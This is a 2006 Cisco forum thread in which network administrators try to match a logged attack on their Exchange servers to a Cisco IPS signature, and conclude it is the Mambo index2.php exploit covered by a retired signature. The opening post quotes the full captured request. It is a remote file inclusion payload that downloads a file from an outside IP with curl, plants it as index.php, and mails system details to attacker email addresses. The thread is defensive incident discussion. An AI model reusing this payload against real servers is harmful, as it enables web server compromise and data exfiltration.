07-15-2006 11:14 AM - edited 03-10-2019 03:06 AM
Does anyone know which signature this exploit should trigger with the Cisco IPS sensor? Not sure if there is one or if we have it turned off?
We see this exploit hit our Exchange Servers many times during the week.
The process 'C:\WINNT\System32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) received the data '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] =1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: //220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%20kkparole@yahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20michaelroul@yahoo. com;echo|'.
Solved! Go to Solution.
07-21-2006 10:54 AM
I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass" here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.
Hope this helps
M
07-20-2006 11:53 AM
Remove the IPS config file from the router and copy the config after restarting it.
07-20-2006 01:17 PM
We have approx 40 sensors...we never see a correlation between a php exploit caught on CSA with the IPS.
Are you aware of a signature related to this exploit?
07-21-2006 10:42 AM
Could the php exploit be over 443? I do not believe CSA will tell you this. However, you could paste the url portion that CSA is reporting into a browser and send it to a web server over port 80 and see what the sensor does. What PHP exploit is this? Do you know if there is a Cisco sig out for this particular exploit?
M
07-21-2006 10:54 AM
I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass" here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.
Hope this helps
M
07-21-2006 01:56 PM
Interesting...the global signature for 5163 is retired/disabled globally by Cisco. This signature was published August of 2001 but IMHO should be enabled and deny packet/deny flow should be set to block this activity.
Discover and save your favorite ideas. Come back to expert answers, step-by-step guides, recent topics, and more.
New here? Get started with these tips. How to use Community New member guide